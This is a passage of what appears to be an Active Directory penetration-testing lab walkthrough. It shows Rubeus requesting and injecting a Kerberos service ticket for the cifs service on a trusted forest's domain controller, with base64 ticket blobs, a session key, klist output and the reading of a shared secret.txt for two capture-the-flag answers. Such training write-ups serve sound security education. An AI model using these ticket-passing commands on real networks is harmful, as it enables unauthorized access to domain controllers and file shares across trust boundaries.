K6ADAgECoSQwIhsEY2lmcxsaZXVyb2NvcnAtZGMuZXVyb2NvcnAuTE9DQUyjggRyMIIEbqADAgESoQMC
AQ6iggRgBIIEXGT5K1k9Ru07eD134Hq+OtD/MzTqtJlzJOHgITw/wlwiYM++piMiZ4a79EvT05bEzgjN
lpTV6ta5K+qm2BS7Q0a97Xec0/4p0C0D8Nm8aOdkai5SylYAla2rFT0s4Qdah5Ej4fDDc22Wr9VI/XL4
ieXPIQyM2DQfVGGtqZ8HG68io8vUjnNe4RVGhPr1cRZUp+rLlFUwOb6Oipdt6PVxhfQB1Q0jw6ZR6C3w
jRfYA/JrZhlXXoviW6QSfYAOBJhQfDKRf5tm+UZK6wRWe1IZxpq5eLwKJC1FcFNya6KvdNa5z7wkYidm
dVjfLUOJqLLRmIY+Q4SehcJIffKzo1zeYMMTxnBGR3E+J3D/i7qD25baFCz2BWq2nM7oQ+pKxmVWJwIT
ujIE0vwB5uu+toFbXX+PbruZYBqE9BcBgWNODZttFGsZDcR30mzd+zTitZY76W78mvFIwOR9EXErM2ew
FWZaa2cg1xcVNvU1T/Nhv6O18VmF8D9YI76Ig9Sa7nLtSvMzr07GYVxdPbYkOX96cbZ5aWB2nCIdhfmP
DtN9TKFbzv44zAcFRRzceUkWfHMztBOQLao7c/zaXF9pZmdGVOnu9cLfr8LdJ8YNC4bGe5fe9oGkaUz+
CdJuD+zd+0Cv9iHaOy5R/+x2u1fhgNhI9SN/cUu3CyujMXMny5QARs6Xo6TMNEdo5NwJvdbaw74fusoG
uHlxOlnP7rqNR5vu1Rl1yLPAF2F3uwhtmv/inTtjeg5GX5IB882bw62DjR7GC+cb6nG4nrk1PznLv16z
fpIHoiGMW47NJ18Bu2eAF0DH7JHAzmhBEJLpp+fU+l1gzk13m+ugW6UHp/+HlXSI9A9k+T9cD5t75EnY
W+k7R3iMW2iDKxnWdzK9qT1PfYjHy4Ci1VXFSklkLsbrQYixTQ4HLVJ3plAC0knogmtXsAteHry53rNN
BKAVPYJVKuNhgYO52F1emVFIo9Yr44oPhi6//efGCsVwN9PKrqa57qk+IDiS6SuIC8nEtba+RUjLj78x
hM1glKV4+3+aGcpQaeW9W4m7tGF+n5wvAZrB04hrEZZv2/j6P8eBG1/3CHOJJHeSbLvBjFXEz6bwNCJ8
NCO1IRCCOkwIV9GW7G3rt++yf1dLhmtpjeAD/78v6dvZpHILJOw8e55Df3KcHIQ58zK3DRCF4oTFUrQV
Fc7QC6F/XNqBgJyZAcqhZx/3ZmjXVEkp2ky6AsooKkHPMBhfo3YK9rvy4bm4HgLEh+7UDsAzpOmy8Ac0
36KSK5eZz22m9a1T0fYdHWSk8TTAcpc0b5iAzBUCTPFVNF9qckGYast3Wst8PIGnAXNoVNPyUB7rdtVm
uDXHxuiwzb1WhS9r974LkV421pMdO7hBVbNBvorTpPByoDywMvTSP684CNxNQ5KqavU5sCnia/ZDBBjH
yN1115j+zArDpL4kMmYS1oWoZ+IFCjXBTA6av3iJzKGFNJmtLDYuRtq8uTr+TqOCAQgwggEEoAMCAQCi
gfwEgfl9gfYwgfOggfAwge0wgeqgKzApoAMCARKhIgQgD/FM7NPPc4tNwttPm7f4rRSpwUvZ+q4VP4QY
pMNRhRKhHBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUyiGjAYoAMCAQGhETAPGw1BZG1pbmlzdHJh
dG9yowcDBQBApQAApREYDzIwMjUxMTIxMTUyMDE2WqYRGA8yMDI1MTEyMjAxMTc0NFqnERgPMjAyNTEx
MjgxNTE3NDRaqBAbDkVVUk9DT1JQLkxPQ0FMqS0wK6ADAgECoSQwIhsEY2lmcxsaZXVyb2NvcnAtZGMu
ZXVyb2NvcnAuTE9DQUw=
ServiceName : cifs/eurocorp-dc.eurocorp.LOCAL
ServiceRealm : EUROCORP.LOCAL
UserName : Administrator (NT_PRINCIPAL)
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 11/21/2025 7:20:16 AM
EndTime : 11/21/2025 5:17:44 PM
RenewTill : 11/28/2025 7:17:44 AM
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : D/FM7NPPc4tNwttPm7f4rRSpwUvZ+q4VP4QYpMNRhRI=
C:\Users\student98>klist
Current LogonId is 0:0x2d1a0029
Cached Tickets: (1)
#0> Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL
Server: cifs/eurocorp-dc.eurocorp.LOCAL @ EUROCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 11/21/2025 7:20:16 (local)
End Time: 11/21/2025 17:17:44 (local)
Renew Time: 11/28/2025 7:17:44 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:
C:\Users\student98>type \\eurocorp-dc.eurocorp.local\SharedwithDCorp\secret.txt
Dollarcorp DAs can read this!
C:\Users\student98>dir \\eurocorp-dc.eurocorp.local\SharedwithDCorp\
Volume in drive \\eurocorp-dc.eurocorp.local\SharedwithDCorp has no label.
Volume Serial Number is 1A5A-FDE2
Directory of \\eurocorp-dc.eurocorp.local\SharedwithDCorp
11/16/2022 04:26 AM <DIR> .
11/15/2022 06:17 AM 29 secret.txt
1 File(s) 29 bytes
1 Dir(s) 7,447,212,032 bytes free
C:\Users\student98>
Note that the only way to enumerate accessible resources (service on a machine) in eurocorp would be to request a TGS for each one and then attempt to access it.
Flag 31 [eurocorp-dc] – Service for which a TGS is requested from eurocorp-dc 🚩
Based on the following command:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgs /service:cifs/eurocorp-dc.eurocorp.LOCAL /dc:eurocorp-dc.eurocorp.LOCAL /ptt /ticket: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
cifs is the service for which a TGS is requested from eurocorp-dc.
Flag 32 [eurocorp-dc] – Contents of secret.txt on eurocorp-dc 🚩
type \\eurocorp-dc.eurocorp.local\SharedwithDCorp\secret.txt
Dollarcorp DAs can read this!